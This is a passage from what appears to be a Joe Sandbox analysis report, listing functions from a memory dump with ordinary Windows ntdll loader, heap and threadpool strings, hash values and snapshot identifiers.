                                                        • Opcode ID: 23483fdbdf830c6bb050d946828fe6d383bd50a93fe7b1c54b6d0f5a69aa9058
                                                        • Instruction ID: aeeb6ee276f12fedd81f23b8064040c7a95ca25530b6720f22938028e528b487
                                                        • Opcode Fuzzy Hash: 23483fdbdf830c6bb050d946828fe6d383bd50a93fe7b1c54b6d0f5a69aa9058
                                                        • Instruction Fuzzy Hash: BC6103366007229BD722CF1DC881F6AF7E9BF80B51F14852DE95D9B285D734EA01CBA1
                                                        Function 018F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019510AE
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01951028
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0195106B
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01950FE5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        • Opcode ID: 2938fb5c45a0f0ced35c516d844a322efb3423f2a9b2b28afa68e75aaa580e91
                                                        • Instruction ID: 22496f20dd7e6faa760900f2f84b233322050f3f57ccea9301befbd584a4dd1f
                                                        • Opcode Fuzzy Hash: 2938fb5c45a0f0ced35c516d844a322efb3423f2a9b2b28afa68e75aaa580e91
                                                        • Instruction Fuzzy Hash: 0971B0B19043059FCB21DF18C888F977BA8AF99764F140568FE489B246E774D688CBD2
                                                        Function 0191245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • apphelp.dll, xrefs: 01912462
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0195A992
                                                        • LdrpDynamicShimModule, xrefs: 0195A998
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0195A9A2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: 4f92ded4bd36880d13d8d5e19f4240d10d4ddfb087e6ae7f14799864635e81eb
                                                        • Instruction ID: b2cb9d919a0c9118227e814a1ca556a72e4290d96bd2cf345597747762d636a4
                                                        • Opcode Fuzzy Hash: 4f92ded4bd36880d13d8d5e19f4240d10d4ddfb087e6ae7f14799864635e81eb
                                                        • Instruction Fuzzy Hash: 80318D75644201ABDB31DF5DD884EAA7BF9FB84B04F26015DED08BB248C7705E81C780
                                                        Function 019029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP: , xrefs: 01903264
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0190327D
                                                        • HEAP[%wZ]: , xrefs: 01903255
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        • Opcode ID: b04ca4b02b618ba3437802af8b3930b1bc253075d10d587c8b6004bbafa5274a
                                                        • Instruction ID: 776dd436669bbf829635826c9fcf00f53893c7676aab45144c68fd7f8562e517
                                                        • Opcode Fuzzy Hash: b04ca4b02b618ba3437802af8b3930b1bc253075d10d587c8b6004bbafa5274a
                                                        • Instruction Fuzzy Hash: CD92DC70A04249DFDB26CF68C444BAEBBF5FF49300F1884A9E949AB391D735AA45CF50
                                                        Function 01900770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: fc20140fbb060c53e4680aa40a1d171cdbc210e988b0ee44225de4d6572e4fb6
                                                        • Instruction ID: 984758b8286a57e1f26340e0bcbd44dc03d72ca5615cb8858e8ee7bd58be2493
                                                        • Opcode Fuzzy Hash: fc20140fbb060c53e4680aa40a1d171cdbc210e988b0ee44225de4d6572e4fb6
                                                        • Instruction Fuzzy Hash: ADF1B030600606DFEB16CF68C894F6ABBF9FF45744F194568E81A9B382D734E981CB91
                                                        Function 01916962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        • Opcode ID: acf7c8a91084cc84f30f1d1ee78d5c1725b3613e9bd5208b694ccf3602e4b9af
                                                        • Instruction ID: a27ac843e4081cdc5cb6ac3448eee1aa73caf719d7a714c32be2bbeefd917121
                                                        • Opcode Fuzzy Hash: acf7c8a91084cc84f30f1d1ee78d5c1725b3613e9bd5208b694ccf3602e4b9af
                                                        • Instruction Fuzzy Hash: B7C29071A083469FD729CF68C840BABBBE9AFC8704F04892DE98DD7245D774D885CB52
                                                        Function 018EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: 75a9f075b2802edaeb6fd42c5a8e45507995888f642197169e71522c1fce4446
                                                        • Instruction ID: 4a34ed63d440b9feb614de224d3a2c2d99184045790f0c2a8c37e49aedf733c6
                                                        • Opcode Fuzzy Hash: 75a9f075b2802edaeb6fd42c5a8e45507995888f642197169e71522c1fce4446
                                                        • Instruction Fuzzy Hash: 50A149759116299FDB31DB68CC88BAAB7B8EF48B14F1001E9EA0DA7250D7359F84CF50
                                                        Function 01910BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpCheckModule, xrefs: 0195A117
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0195A121
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0195A10F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-161242083
                                                        • Opcode ID: 31baa87eddd264c8be0edb77d915705c961f685882a88e3bbb8f447edd8dd4c9
                                                        • Instruction ID: ad241d22f45fed3818cc0c879a77cb04c6b6b3cc13628a91a5d809880a647bd8
                                                        • Opcode Fuzzy Hash: 31baa87eddd264c8be0edb77d915705c961f685882a88e3bbb8f447edd8dd4c9
                                                        • Instruction Fuzzy Hash: 5771C074E002099FDB25DF6CC980AAEB7F4FB84304F18446DE90AEB255E735AA81CB51
                                                        Function 01900A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-1334570610
                                                        • Opcode ID: cd3b44c216466382a2b7f0980e57da7ed9f6f863abf4fe065dd18b98cbe134c4
                                                        • Instruction ID: e00b35b23e1903b52cf6c64bf4566447bd1b2726901fe58d0105162fa2fbc52e
                                                        • Opcode Fuzzy Hash: cd3b44c216466382a2b7f0980e57da7ed9f6f863abf4fe065dd18b98cbe134c4
                                                        • Instruction Fuzzy Hash: 7061CE30600702DFEB2ADF28C484B6ABBE5FF45744F198569E85D8F292D770E981CB91
                                                        Function 0192C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 019682DE
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 019682E8
                                                        • Failed to reallocate the system dirs string !, xrefs: 019682D7
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1783798831
                                                        • Opcode ID: 9692640d377ca36ce170002d3b3c1968de5f01a98b25e6a4ce362c9e16c633f1
                                                        • Instruction ID: f5c2e599e6ee302659e4a36c1f43e5fde0c83519dff7d7aa22edeb2970f92ec4
                                                        • Opcode Fuzzy Hash: 9692640d377ca36ce170002d3b3c1968de5f01a98b25e6a4ce362c9e16c633f1
                                                        • Instruction Fuzzy Hash: 3B41F1B1558311ABDB31EB68D844B5B77ECAF98B50F00492AF94CD7298E774D900CB91
                                                        Function 019AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • PreferredUILanguages, xrefs: 019AC212
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019AC1C5
                                                        • @, xrefs: 019AC1F1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        • Opcode ID: bbc5d854744a1cc61e36f327efe2e1f19848e744a36470891a526b0d6ca57ae1
                                                        • Instruction ID: 57f1f75c2690fed9e482e3ecafb38b7efc61fd0c17bd91169bff181206e49a0b
                                                        • Opcode Fuzzy Hash: bbc5d854744a1cc61e36f327efe2e1f19848e744a36470891a526b0d6ca57ae1
                                                        • Instruction Fuzzy Hash: 04417271E00209ABDF11DBD8C885FEEBBBCAB54701F40416AEA0DFB240D774DA488B90
                                                        Function 01984144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        • Opcode ID: a8371ff2c4fbfc812212c19cf1a718abad7a03714607eefd8671eb1ae52542b2
                                                        • Instruction ID: 0a6148d9552f1e9fe2beadeae83604bd5cfabec9b6580eea5e2ce966add9dbc1
                                                        • Opcode Fuzzy Hash: a8371ff2c4fbfc812212c19cf1a718abad7a03714607eefd8671eb1ae52542b2
                                                        • Instruction Fuzzy Hash: A9412931A0475ACFEB26EBE9C840BADBBB8FFA5340F14045AD909EB791D7349901CB11
                                                        Function 01974755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpCheckRedirection, xrefs: 0197488F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01974888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01974899
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        • Opcode ID: 69915fcef299d4a0e92f78fbf9850d381502ed10ca54fb0816ed68b71e98d5b5
                                                        • Instruction ID: c6bcb8a519fc124bc4c7f18495b49b03f22102659fa590702d033c1ac70ef237
                                                        • Opcode Fuzzy Hash: 69915fcef299d4a0e92f78fbf9850d381502ed10ca54fb0816ed68b71e98d5b5
                                                        • Instruction Fuzzy Hash: 55419E72A047559BCB21CE6CD840EA6BBE8BF89A51F05056DED5DDB313E731E800CB92
                                                        Function 01900BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        • Opcode ID: 7e75bd6020a2436cc937cb1fbb9b7306dc4f3ee18c57bb0e164e15e1b309b1af
                                                        • Instruction ID: 506645b48a8f8f3102cdf2f20f38810edbeb54f4ca1e6a1a98e8c2880d400c91
                                                        • Opcode Fuzzy Hash: 7e75bd6020a2436cc937cb1fbb9b7306dc4f3ee18c57bb0e164e15e1b309b1af
                                                        • Instruction Fuzzy Hash: 46110230314542CFEB5ADE18C484F36BBA9EF41B56F198419F80EDB292E730E841C741
                                                        Function 019720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializationFailure, xrefs: 019720FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 019720F3
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01972104
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        • Opcode ID: ce3cc00471524edccfbbe61bcd291848f94aa0ae8ab60bbe47d9fbb195cc6c46
                                                        • Instruction ID: 94cce46a7b43cf0010dc6651bd2cb1519cc1ad327b143e10c6a5df86c4121fce
                                                        • Opcode Fuzzy Hash: ce3cc00471524edccfbbe61bcd291848f94aa0ae8ab60bbe47d9fbb195cc6c46
                                                        • Instruction Fuzzy Hash: F1F0C275680308BBE724EB4DEC57FA937ACFF81B54F100069F708AB385D2B0AA00C691
                                                        Function 019003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        • Opcode ID: fc8ca2cfcb70624d8c98eb270ae41291a32c16a285453703c547ed9d2e50446b
                                                        • Instruction ID: efb7d29e549a341bc722cbe4983fd8541c0f8c206e5e88479e144b268c6ca5a3
                                                        • Opcode Fuzzy Hash: fc8ca2cfcb70624d8c98eb270ae41291a32c16a285453703c547ed9d2e50446b
                                                        • Instruction Fuzzy Hash: 39715B71A0014A9FDB02DFA8C994FAEB7F8BF58744F154065E909E7291EA34EE41CB60
                                                        Function 018FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 018FAA25
                                                        • LdrResSearchResource Enter, xrefs: 018FAA13
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        • API String ID: 0-4066393604
                                                        • Opcode ID: 99fd72ab0dcb8fdf65803d5efbae33c4c4c430238b52a4253e45237ddf9001f8
                                                        • Instruction ID: f807215c0b823719350ceee5f259720b9b516cb047120e69cfcb60418276b587
                                                        • Opcode Fuzzy Hash: 99fd72ab0dcb8fdf65803d5efbae33c4c4c430238b52a4253e45237ddf9001f8
                                                        • Instruction Fuzzy Hash: 8BE19271E04209DFEB26CFA9D980BAEBBB9BF44364F104429EE09E7251D774DA44CB50
                                                        Function 019BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction ID: db5f09ad505810e19c856fb41b9ec5eb6e3916b1cc9e0011b141ea2c9a1406cf
                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction Fuzzy Hash: 73C1E3712043469BE725CF28CA84BABBBE9AFC4714F044A2DF69A87290D774D505CB41
                                                        Function 0196E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: ac4ee992c44c2423b702d1583fdbc33ea624f6d8721c635682e5f0ee18a96bfb
                                                        • Instruction ID: 5d332095404c72b6f8450eba59a5e42905d77b0768ad47a5cdf0be26bea1e0f6
                                                        • Opcode Fuzzy Hash: ac4ee992c44c2423b702d1583fdbc33ea624f6d8721c635682e5f0ee18a96bfb
                                                        • Instruction Fuzzy Hash: 74615C75E003199FDB25DFA8C980BAEBBB9FF44700F24442DE649EB291D735A900CB61
                                                        Function 019943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        • API String ID: 0-17815947
                                                        • Opcode ID: eddc5337bb12553486e711aafd818aed1741b3a78301eed0bf99f2dfde965d9b
                                                        • Instruction ID: b14c90148fbab92402f44719bce4a8cb2aa20489e88d2bb8c95d8b1648c161e7
                                                        • Opcode Fuzzy Hash: eddc5337bb12553486e711aafd818aed1741b3a78301eed0bf99f2dfde965d9b
                                                        • Instruction Fuzzy Hash: 9151F971D0061DAFDF12DFE9CD90AEEBBBDEB44754F100529E619AB290D7309A05CB60
                                                        Function 018F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • kLsE, xrefs: 018F0540
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018F063D
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        • Opcode ID: 645df84b2f654be7b48e215e8fc18c73b5641bd3f708c552539783591acae67e
                                                        • Instruction ID: df4e10cbe7bf7309c4ca9a80edc7f62fc02b4a35868185317f53677d0fa3ec1e
                                                        • Opcode Fuzzy Hash: 645df84b2f654be7b48e215e8fc18c73b5641bd3f708c552539783591acae67e
                                                        • Instruction Fuzzy Hash: 9D51BF715047468FD724DF68C4446A7BBE6AF88704F10483EF6DAC7242E774E645CB92
                                                        Function 018FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 018FA309
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 018FA2FB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        • Opcode ID: e335ced6d0f73ec60f0d93a3e3ba530c7469aec0cc6c58596996d33664073f50
                                                        • Instruction ID: d8d15e90c2dcfb548fcf126d531da7f03bed4c77a1ad28b521efd5d5d850ac01
                                                        • Opcode Fuzzy Hash: e335ced6d0f73ec60f0d93a3e3ba530c7469aec0cc6c58596996d33664073f50
                                                        • Instruction Fuzzy Hash: 1D41B034A04649DFDB19DF69C840B69BBB8FF85714F144069EE08EB291E775DA00CB50
                                                        Function 0192A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        • Opcode ID: e73e883fb975702fb5fb799cf665d811f781e1507076d7b9b99396e951d1a16a
                                                        • Instruction ID: 7d8ed4cdb81737a39fcade2a27e27ef4214e2387b14d3fc8cf72d7634cd8e0cc
                                                        • Opcode Fuzzy Hash: e73e883fb975702fb5fb799cf665d811f781e1507076d7b9b99396e951d1a16a
                                                        • Instruction Fuzzy Hash: 6701FDB3214700AFD321CF14DD45B1277E8E794B15F008839E20CCB590E334E808CB46
                                                        Function 018FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        • Opcode ID: b7998ee41507d9767748dd83e4c8f8d7a4f44aead5a70cebca263a531eed2275
                                                        • Instruction ID: 227cbaf62baabce01c33ed5bb83a6784d16910132274b46f36fbe38ac9f2db5d
                                                        • Opcode Fuzzy Hash: b7998ee41507d9767748dd83e4c8f8d7a4f44aead5a70cebca263a531eed2275
                                                        • Instruction Fuzzy Hash: 41824B75E0021D9BEB25CFA9C880BEDBBB5FF48314F14826DDA59EB291D7309A41CB50
                                                        Function 01976420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 2124a2fd46e4d373752d5fac3d8a7ce35685e6a5473a367f4101866e984eab3e
                                                        • Instruction ID: 8b072177a7a8248925a92905820574e779ac9efaf08c8e202386352d29e1c1d8
                                                        • Opcode Fuzzy Hash: 2124a2fd46e4d373752d5fac3d8a7ce35685e6a5473a367f4101866e984eab3e
                                                        • Instruction Fuzzy Hash: C2918471A00619AFEB21DF95CD85FAEBBB8EF54B50F100065F608BB194D774AD44CBA0
                                                        Function 0199E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 7ef25d35d1b8ea5097c44b11b5ce1887d9e43da92c5248be2b8f066df78068d6
                                                        • Instruction ID: 947aa5c44368a1980619a09811b07bb8b670656b43ef60a201e784d9309f8847
                                                        • Opcode Fuzzy Hash: 7ef25d35d1b8ea5097c44b11b5ce1887d9e43da92c5248be2b8f066df78068d6
                                                        • Instruction Fuzzy Hash: 1F918E72901609BEEF26EBA9DC44FAFBB79EF85740F100029F509A7250EB759941CB90
                                                        Function 0192A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        • Opcode ID: 9943a9580d8f58a2eab5d5f88f42be2c62ad95d6946ae376aeb339d337f0d347
                                                        • Instruction ID: 480ad3ee3dd5776aaffe0e104406744c10db5536b90f5c5a0a57602fbead5a73
                                                        • Opcode Fuzzy Hash: 9943a9580d8f58a2eab5d5f88f42be2c62ad95d6946ae376aeb339d337f0d347
                                                        • Instruction Fuzzy Hash: 0171B275E0031ACFDF28CFACC590AADBBB9BF98701F14812EE509A7241E7349941CB60
                                                        Function 01994978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .mui
